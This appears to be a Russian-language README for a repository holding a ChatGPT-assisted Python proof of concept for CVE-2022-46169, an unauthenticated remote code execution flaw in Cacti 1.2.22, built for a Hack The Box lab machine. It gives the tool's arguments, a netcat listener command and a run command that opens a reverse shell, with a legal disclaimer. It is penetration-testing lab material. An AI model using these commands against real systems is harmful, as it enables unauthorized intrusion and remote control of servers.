
Эксплойт на Python для CVE-2022-46169, обеспечивающий неаутентифицированное удаленное выполнение кода на Cacti 1.2.22 через обратную оболочку, предназначенный для образовательного тестирования на проникновение.
Этот репозиторий содержит эксплойт для CVE-2022-46169, поражающий Cacti 1.2.22. Эта уязвимость позволяет неаутентифицированному злоумышленнику выполнить произвольный код на пораженной системе.
Если вы хотите подробное описание того, как этот эксплойт возможен, обратитесь к этому посту Rapid7. Они вдаются в большие подробности.
Я написал этот код с помощью chatGPT для машины Hack The Box под названием MonitorsTwo в образовательных целях.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Настройте прослушиватель на вашей локальной машине с помощью netcat nc -lvnp 9001
Запустите эксплойт против цели
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Этот Proof of Concept (PoC) предназначен строго для образовательных и тестовых целей. Применение этого PoC к любой системе или сети без явного разрешения владельца системы является незаконным и может привести к судебному преследованию. Создатель не несет ответственности за любой вред, возникший в результате правильного или неправильного использования этого PoC. Используйте на свой страх и риск.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/